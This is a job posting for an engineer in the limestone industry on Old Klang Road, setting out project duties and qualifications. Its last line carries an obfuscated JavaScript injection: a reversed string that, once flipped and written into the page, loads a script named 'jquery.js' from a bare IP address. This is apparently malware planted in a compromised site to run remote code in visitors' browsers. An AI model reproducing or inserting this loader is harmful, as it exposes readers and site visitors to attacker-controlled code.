Location : Old Klang Road
Industry : Limestone
Salary : Negotiable
– Provides services in mechanical, electrical, technical, process or chemical engineering, whichever engineering discipline is applicable.
– Responsible for entire project cycle to include design, development, and project completion.
– Prepares designs, drawings, plans and specifications for projects, engineered systems, or technical equipment to applicable, accepted engineering practices & standards.
– Plans, schedules, conducts, co-ordinates & monitors work for compliance.
– Prepares & reviews proposed changes to blueprints, schematic drawings, plans & layouts.
– Ensures effective communication and co-ordination on assigned projects with all other project participants.
– Responsible for planning, scheduling, conducting and coordinating the technical and management aspects of projects.
– Responsible for communicating with management & accountable for team actions & project development.
– Responsible for preparation of construction cost estimates & project time schedules.
– Co-ordinates team activities & prepares and submits regular status reports on development projects under his charge to the Project Manager and to Management. The report shall include cost incurred versus project budgets and explanations on variances arising there from.
– Other duties as assigned.
– Bachelor of Science degree in engineering (electrical, mechanical, chemical, process, whichever is applicable).
– Minimum 5 years’ experience in related industry.
– Must have excellent mathematical, computer skills, including AutoCADD, & analytical skills.
– Posses ability to read & interpret prints/specs, technical drawings/writing, and organizational skills.
– Project management skills.
– The ability to work within budgets & to deadlines.
– Comprehensive knowledge of relevant legal regulations.
– Confident decision-making ability. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))